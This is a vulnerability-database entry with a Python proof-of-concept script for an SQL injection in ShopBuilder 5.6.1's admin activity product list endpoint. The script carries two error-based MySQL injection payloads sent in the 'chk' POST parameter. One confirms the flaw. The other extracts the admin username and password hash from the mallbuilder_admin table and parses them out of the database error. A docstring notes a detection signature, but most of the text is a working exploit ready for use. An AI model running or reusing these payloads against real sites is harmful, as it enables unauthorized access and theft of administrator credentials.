ShopBuilder 5.6.1 /module/activity/admin_activity_product_list.php SQL注入漏洞

2014-10-28T00:00:00
ID SSV:88919
Type seebug
Reporter Root
Modified 2014-10-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding=utf-8

import re
import urllib2

from comm import cmdline
from comm import generic


# Metadata record for this PoC (consumed by the comm.* harness, see __main__).
# Values are reproduced exactly; only the dict is built with keyword form.
poc_info = dict(
    VulId='1563',
    Name='ShopBuilder 5.6.1 /module/activity/admin_activity_product_list.php SQL注入漏洞 POC',
    AppName='ShopBuilder',
    AppPowerLink='http://www.shop-builder.cn',
    AppVersion='5.6.1',
    VulType='SQL Injection',
    # Original description: the 'chk' parameter is concatenated into SQL unfiltered.
    Desc='''
            chk 参数未经过过滤拼入 SQL 语句,造成 SQL 注入漏洞。
            ''',
    Author=['zhengdt @ knownsec'],
    VulDate='2014-09-29',
    CreateDate='2014-10-13',
    UpdateDate='2014-10-13',
    References=['http://wooyun.org/bugs/wooyun-2014-072830'],
    Version='1',
)

# Shared in/out record: cmdline.main() fills URL/Mode/Verbose from argv,
# main() writes Status/Result/Error, generic.output() renders it.
io_info = dict(
    URL='',        # target base URL, filled by the command line
    Mode='v',      # 'v' = verify only, 'a' = also extract (see main)
    Verbose=False,
    Error='',      # set on exception in main()
    Status=0,      # 1 once the check succeeds
    Result={},     # 'VerifyInfo' or 'AdminInfo' sub-dicts
)


def main(io_info):
    """Run the ShopBuilder 5.6.1 check described in poc_info against io_info['URL'].

    Mode 'v' only confirms the injection; mode 'a' additionally reads one row
    from mallbuilder_admin. Nothing is returned: the outcome is written back
    into io_info ('Status', 'Result', 'Error').

    For defenders: every request here is a POST to the admin activity-list
    endpoint whose body contains 'information_schema' and 'floor(rand(0)*2)',
    the classic error-based (duplicate-key) MySQL injection pattern -- a
    useful WAF / access-log signature for this module.
    """
    url = io_info.get('URL', '')
    mode = io_info.get('Mode', 'v')
    verbose = io_info.get('Verbose', False)
    # Request headers come from the shared comm.generic helper (not visible here).
    headers_fake = generic.modify_headers(io_info)

    # Admin-module endpoint; the vulnerable 'chk' parameter travels in the POST body.
    vul_url = '%s/?m=activity/admin&s=activity_product_list' % url

    if mode == 'v':
        try:
            # Error-based probe: the injected md5('1513644312') is expected to be
            # echoed back inside the database error text.
            payload = 'chk[]=1) and (select 1 from(select count(*),concat((select (select (select md5(15136' \
                      '44312))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from informati' \
                      'on_schema.tables group by x)a)#'

            if verbose:
                print '[*] %s - Executing payload ...' % url
            response = urllib2.urlopen(urllib2.Request(vul_url, headers=headers_fake, data=payload)).read()

            # Success criterion is this fixed constant in the response body
            # (presumably md5('1513644312'); the script never recomputes it).
            if '4be0d4871abae85cae972cd885f5b1e9' in response:  
                io_info['Status'] = 1
                io_info['Result']['VerifyInfo'] = {}
                io_info['Result']['VerifyInfo']['URL'] = url

        # Any failure (network error, HTTP error page) is recorded in
        # io_info['Error']; Status stays 0.
        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return

    if mode == 'a':
        try:
            # Same injection shape as mode 'v', with the md5 probe swapped for
            # concat(user, ':', password) from mallbuilder_admin.
            payload = 'chk[]=1) and (select 1 from(select count(*),concat((select (select (select concat(' \
                      'user,0x3a,password) from mallbuilder_admin limit 1)) from information_schema.table' \
                      's limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'

            # Pulls "user:<32 chars>" out of the MySQL "Duplicate entry" message;
            # the trailing '1' is the floor(rand(0)*2) suffix appended by concat.
            match_data = re.compile('Duplicate entry \'(.*):([\w\d]{32})1\'')

            if verbose:
                print '[*] %s - Executing payload ...' % url
            response = urllib2.urlopen(urllib2.Request(vul_url, headers=headers_fake, data=payload)).read()

            if verbose:
                print '[*] %s - Get username and password of admin ...' % url

            # findall()[0] raises IndexError when the pattern is absent; that is
            # swallowed by the broad except below and only shows up in io_info['Error'].
            username, password = match_data.findall(response)[0]

            if username and password:  
                io_info['Status'] = 1
                io_info['Result']['AdminInfo'] = {}
                io_info['Result']['AdminInfo']['Username'] = username
                io_info['Result']['AdminInfo']['Password'] = password

        # Mirrors the mode 'v' handler: record the error text, leave Status at 0.
        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return


if __name__ == "__main__":
    # CLI entry: comm.cmdline populates io_info from argv before the check runs.
    cmdline.main(io_info, usage='', argvs=[])
    verbose = io_info['Verbose']
    if verbose:
        print '\n[*] Init ...\n'
    main(io_info)
    # generic.output renders io_info (Status/Result/Error) for the console.
    report = generic.output(io_info)
    print report